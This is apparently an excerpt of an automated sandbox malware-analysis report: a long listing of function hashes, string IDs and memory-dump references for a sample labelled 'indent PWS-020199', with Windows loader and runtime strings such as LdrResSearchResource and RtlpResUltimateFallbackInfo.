                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: #%u
                            • API String ID: 48624451-232158463
                            Strings
                            • LdrResSearchResource Exit, xrefs: 014BAA25
                            • LdrResSearchResource Enter, xrefs: 014BAA13
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                            • API String ID: 0-4066393604
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$MUI
                            • API String ID: 0-17815947
                            Strings
                            • kLsE, xrefs: 014B0540
                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014B063D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                            • API String ID: 0-2547482624
                            Strings
                            • RtlpResUltimateFallbackInfo Exit, xrefs: 014BA309
                            • RtlpResUltimateFallbackInfo Enter, xrefs: 014BA2FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                            • API String ID: 0-2876891731
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Cleanup Group$Threadpool!
                            • API String ID: 2994545307-4008356553
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: MUI
                            • API String ID: 0-1339004836
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: GlobalTags
                            • API String ID: 0-1106856819
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: .mui
                            • API String ID: 0-1199573805
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: EXT-
                            • API String ID: 0-1948896318
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: #
                            • API String ID: 0-1885708031
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryName
                            • API String ID: 0-215506332
                            Strings
                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0153895E
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                            • API String ID: 0-702105204
                            • Opcode ID: fde12851a52c08314b567e775b8251ecaba37bfb64aa39d9576f020510084848
                            • Instruction ID: d8d0775e743ac07b13e663e7ba4c7815b031c39f763dd2ebb3e791b96b953c76
                            • Opcode Fuzzy Hash: fde12851a52c08314b567e775b8251ecaba37bfb64aa39d9576f020510084848
                            • Instruction Fuzzy Hash: 0001F7332502119BE6296A5ADCC4E9E7BA5FFD1254B45062DF6411F161CB306845C7A2
                            • Instruction Fuzzy Hash: 9351B931D0020AEFDF169F94C896FAEBBF5FB90314F154659D6116B290D7709E418BA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8098024e3f0d7bb48b5287e1935c3c22eec316f95ef2a1a2eb6c0c7dbbc8f12
                            • Instruction ID: 764c00e6720f204bd8dd565b8cb2d5505fd2390541b74f14c3fce759befae6f4
                            • Opcode Fuzzy Hash: f8098024e3f0d7bb48b5287e1935c3c22eec316f95ef2a1a2eb6c0c7dbbc8f12
                            • Instruction Fuzzy Hash: B041DB717016129BD725DB2DE89AF7FBB9AFFD0620F088519E9598F280D730D801C791
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f0a58eb807297c655ebc58533a219c7a53fd742b1427339274873b13fb02e3d
                            • Instruction ID: 5e3813d31fb3726cab0727e69ad9d050adaa67f9a606f4ea7fb120aa928ed561
                            • Opcode Fuzzy Hash: 1f0a58eb807297c655ebc58533a219c7a53fd742b1427339274873b13fb02e3d
                            • Instruction Fuzzy Hash: 7A518E7590021ADFCB20DFA9C98499EBBB9FB98314B55491AE516BB300D734AD01CB90
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                            • Instruction ID: 42dd89a2f412ab4c8c8be773bcb08255b2e0e6a5823ad9368aaec86c0885ff64
                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                            • Instruction Fuzzy Hash: F041F9726007169FDB25DF28D981A6FB7E9FF90210B09462EE9568F640EB70ED14C7D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e8fe7a896e98fad32e1d27832541b67f6c0cffaa56dbac167121f190c901e54
                            • Instruction ID: a366b117288730945c38f04393a2189fe4d3421a757511f273caabaa6197d243
                            • Opcode Fuzzy Hash: 5e8fe7a896e98fad32e1d27832541b67f6c0cffaa56dbac167121f190c901e54
                            • Instruction Fuzzy Hash: 1541AC36A012159BDB11DF98C444AEEB7F4BF58611F14812BF825AB360D7B49C42CBA4
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 47838f556248d009c2b0978d954c1e7d25bf3ef14d142e4bb78444a37f13386b
                            • Instruction ID: cc6f18bfddb6cf349fc6ef51a6ab4d8d8d734b3024baef24772ef8c0215fefe9
                            • Opcode Fuzzy Hash: 47838f556248d009c2b0978d954c1e7d25bf3ef14d142e4bb78444a37f13386b
                            • Instruction Fuzzy Hash: F041E4712003029FEB21DF29C894A2BB7E5FF98614F45482FE557DB325DB71E8498B50
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction ID: fb63e463adf30970e5ae953e7002f958b1a6a9df7238b4dc64974d23b8e6d93d
                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction Fuzzy Hash: 84516C76A00625CFCB15CF58C480AADF7B2FF85710F2481A9D915AB795D770EE42CB90
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 575c645b5bf9077f0663018236f19afeb329b2874d2c121d50b1a6018be9275e
                            • Instruction ID: 9a52bb93c7c1d7a8a931b4da5453ed6c82db547a501a5b9fb999efade10dbcb4
                            • Opcode Fuzzy Hash: 575c645b5bf9077f0663018236f19afeb329b2874d2c121d50b1a6018be9275e
                            • Instruction Fuzzy Hash: C6510670940217DBEB2A9B28CC40BEDBBB1FF21314F1582AAD5259B2E5D7749981CF50
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 197783bf2be15d7a3d6aa48847f7383877db1fa6b7a4e9e0b247210c0c79535e
                            • Instruction ID: d83d085b63af053fe4ef72de6650f063db1b4e833fbf122d0e769eec37abc7ed
                            • Opcode Fuzzy Hash: 197783bf2be15d7a3d6aa48847f7383877db1fa6b7a4e9e0b247210c0c79535e
                            • Instruction Fuzzy Hash: 9041C476A00228DBDB21DF69C881BEE77B4FF54740F0504AAE908AB251D7749E81CF91
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                            • Instruction ID: dec2726912a24e31e2d62df118fc6b858314ebd5b1a466267891ffa05a341a01
                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                            • Instruction Fuzzy Hash: B341A675B00106ABDB15DF99DC9AABFBBBABF98600F244069E905EB341D670DD01C7A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 94a79caa1505723f988b1de932195bba06284d1b069bcd920656012608591244
                            • Instruction ID: 1a7a47ae35e795cae5f0f790434729828ff2a88af28662a560e27127e5efeda2
                            • Opcode Fuzzy Hash: 94a79caa1505723f988b1de932195bba06284d1b069bcd920656012608591244
                            • Instruction Fuzzy Hash: 4341E2706007029FE325CF29C580A67B7F5FF58315B144A6FE55787A60E770E846CBA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39b51515a2f89d82a165a1667e9f60013c190c7e54e76b83370996f3e2e08251
                            • Instruction ID: 4f9761fdef475f628bee202c345a1027d5f6167523bb2cdcee5ff9ea70806965
                            • Opcode Fuzzy Hash: 39b51515a2f89d82a165a1667e9f60013c190c7e54e76b83370996f3e2e08251
                            • Instruction Fuzzy Hash: 0341F332980205CFDF22DF68C4A47EE7BB4FB54310FA9016AD521AB3A5DB74D905CB64
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ede6530af7a30ceee49f400e42f9a89ab1b13c3320dec0d2a942d03e0816ad8f
                            • Instruction ID: c8894c0cc2324323e133c68e6a18e73e49de61aa8b7d87233602c008259f3aeb
                            • Opcode Fuzzy Hash: ede6530af7a30ceee49f400e42f9a89ab1b13c3320dec0d2a942d03e0816ad8f
                            • Instruction Fuzzy Hash: 96412671900203CBD7259F89C880A9EBBBDFB94710F69802FD5219F365D374D802DBA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 852607fbd45ab082d79a3b90bbafac534dbf176da75e7864998eed113dd304b6
                            • Instruction ID: 1563115baf6075314d793e181214efa8859266b146d8974e13fac53c07ac018e
                            • Opcode Fuzzy Hash: 852607fbd45ab082d79a3b90bbafac534dbf176da75e7864998eed113dd304b6
                            • Instruction Fuzzy Hash: AC414D755083069ED712DF658880A6BF6E9FF94B54F81092FF984DB260E730DE058B93
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                            • Instruction ID: f6ba070304c21f8246e5a20796d76cd38e1ecfbf0ae882d6fc5173ea4f873110
                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                            • Instruction Fuzzy Hash: 85413C75A04211DBDB12DE9984C0BBEBB71FB70754FA7806FE9558F290D6329D40CB90
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 968686f8fa13ab371cc3efe7481d8f9c4dc706387fc77cfad1cc7e0a48b1c255
                            • Instruction ID: dcb146371944a3248aaa56a80c3f80fd07aaec60d6fb9d8fd7cfdec2437a9932
                            • Opcode Fuzzy Hash: 968686f8fa13ab371cc3efe7481d8f9c4dc706387fc77cfad1cc7e0a48b1c255
                            • Instruction Fuzzy Hash: D7414A71640601DFD721CF59C880B67BBF4FB68715F248A6EE4498B361E771E9428BA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                            • Instruction ID: bbbfb0c8504e505f416fe5459eaf85b227ccad997d719644269bdd719926071d
                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                            • Instruction Fuzzy Hash: 11413975A00605EFDB24CF99C994AAABBF4FF18701B10496EE566D7260D370EA44CF50
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7562e07bf0321097cf53db908387108db105b61f37108bd47d96e95229efb89
                            • Instruction ID: 514bbc3bca5d5e32dead53de0a9df267f71da994df0d03d250861b813d07e1f7
                            • Opcode Fuzzy Hash: b7562e07bf0321097cf53db908387108db105b61f37108bd47d96e95229efb89
                            • Instruction Fuzzy Hash: 5841AD71901705CFC722EF69C980A9AB7F5FF64310F1585AFC41A9B2B1DBB0A941CB61
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a27da9df19fac2e3ba102ab3c20c93a1e54ebbbd1755c3c76ad16b8b817ab0d
                            • Instruction ID: 86850f4f2da0876ab766f76735dbf546c65b5189a5caa1f47818cd3a8b8d9fb2
                            • Opcode Fuzzy Hash: 2a27da9df19fac2e3ba102ab3c20c93a1e54ebbbd1755c3c76ad16b8b817ab0d
                            • Instruction Fuzzy Hash: 84317AB2A01355DFDB12DFA8D040799BBF0FB49715F2081AED119EB2A1D3369902CF90
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 882b3e2bb5f1aaeaa8fb5227540d35d010ac110944f7f9b270bc52497b193fd0
                            • Instruction ID: df7081f1b51a5160f8b8823b2d27b4d04b9cf392ff92d3aa821613777a3a13b3
                            • Opcode Fuzzy Hash: 882b3e2bb5f1aaeaa8fb5227540d35d010ac110944f7f9b270bc52497b193fd0
                            • Instruction Fuzzy Hash: 19418CB25043419FD720DF29C844B9BBBE8FF98664F404A2EF5A8DB291D7709904CB92
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 634bb28c4a9080652c91686a188394e313146d6190dde2d75df43e1b165c948b
                            • Instruction ID: d6d98750c9ce7f1d2e14774ba121fe4d84a2830896fc4c5ef8c83a7e2c43d915
                            • Opcode Fuzzy Hash: 634bb28c4a9080652c91686a188394e313146d6190dde2d75df43e1b165c948b
                            • Instruction Fuzzy Hash: 8841F671A055179FCB01DF59C880AA9B7B1FF74761F55822BD815A72A0DB30FD428BD0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81775bcc6230d96f680ad0c0e07a4352cc5bdd4c76c13dc190940a699e814465
                            • Instruction ID: eea155453c0594f62a31ce23daffacc86061a13a13e31ea98d4604d57b87ad1a
                            • Opcode Fuzzy Hash: 81775bcc6230d96f680ad0c0e07a4352cc5bdd4c76c13dc190940a699e814465
                            • Instruction Fuzzy Hash: FA41BF726047429FD321DF69C840A6EB7E9BFD8700F144A2EF9949B690E730E905C7A6
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bb2c298263b069734bf4f38d4311bff6a25e5781d76ac4192865d561729995b
                            • Instruction ID: 412e586c862ffb9b7399bcdf5208924652e0b9e8829c6c376b413afeda2e1ee5
                            • Opcode Fuzzy Hash: 7bb2c298263b069734bf4f38d4311bff6a25e5781d76ac4192865d561729995b
                            • Instruction Fuzzy Hash: D941B1302003019BD725DF29D884B6BBBE5AF90750F18442EE6568B3B2DB70D855CB61
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10f5f0c83505a635b783361741fb6087f9b7da836b102462a27fb598f6909609
                            • Instruction ID: ccaa4833b569f3e35b5e1e3db0a4af6f05982f28a16254814bfb2ca1e34fd8ea
                            • Opcode Fuzzy Hash: 10f5f0c83505a635b783361741fb6087f9b7da836b102462a27fb598f6909609
                            • Instruction Fuzzy Hash: 61418CB1A01206CFCB15CF69C98099DBBF1FFA8221B55862FD566A72B0DB30A9018F40
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                            • Instruction ID: 507d2dfbdf8dcf0e3e5e3fce6fbe9bb670eb388c9f922aeabcb58effc63ce9ca
                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                            • Instruction Fuzzy Hash: 54310439A04245EBDB528B69CC84BDBBBE8AF54750F0441ABF415DB362C7749844CBA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0629dafa43cbd7cbfe8a99619c9559a6f9447a23b9d7c2b5410b0b36fd3fa064
                            • Instruction ID: c68f0d4a8bf5047e691bed359d58786cdb348bc3f1f0b173510e16c30eab1bef
                            • Opcode Fuzzy Hash: 0629dafa43cbd7cbfe8a99619c9559a6f9447a23b9d7c2b5410b0b36fd3fa064
                            • Instruction Fuzzy Hash: 2131AA75740706EBDB229F558C51F6FBAA8FB58B50F01002EFA00AF291DAB4DD00C7A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1592ffd6698be637ae4b21aaa2de8930c0005bb3e02587e8383aaf99c44308e
                            • Instruction ID: 123dd9031dd11102a4d4cc45b1797793cea82616acb9f64039b4564b93878b0f
                            • Opcode Fuzzy Hash: b1592ffd6698be637ae4b21aaa2de8930c0005bb3e02587e8383aaf99c44308e
                            • Instruction Fuzzy Hash: 2F31D4322052018FD721DF1DD890E2ABBE9FB80360F4A446EE9658F765DB30E844DBD1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 60c908a732cc9169bb3e6601021a61a96f11b122e1da52fb10450594480567a1
                            • Instruction ID: cd32e53bc1695d58d8a7d5e41fb9a233e158dcfa04ac927558645c0de84c2b8b
                            • Opcode Fuzzy Hash: 60c908a732cc9169bb3e6601021a61a96f11b122e1da52fb10450594480567a1
                            • Instruction Fuzzy Hash: 1F41D171200705DFD722DF28C880FDA7BE4BF55710F18842EE6AA8B2A1C770E845CB60
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0753d762af869ed6307a1119823acd8ea7af4befc70577c2806a4bcbb8641c41
                            • Instruction ID: 219c28dc1655a5d4198cf1347ef4cbb64128424c8d3105a7ecaaf2482d9f7ab6
                            • Opcode Fuzzy Hash: 0753d762af869ed6307a1119823acd8ea7af4befc70577c2806a4bcbb8641c41
                            • Instruction Fuzzy Hash: B4318F716042018FE720DF29C890E2ABBE9FB84750F0A496DF9659F795E730EC04DB91
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
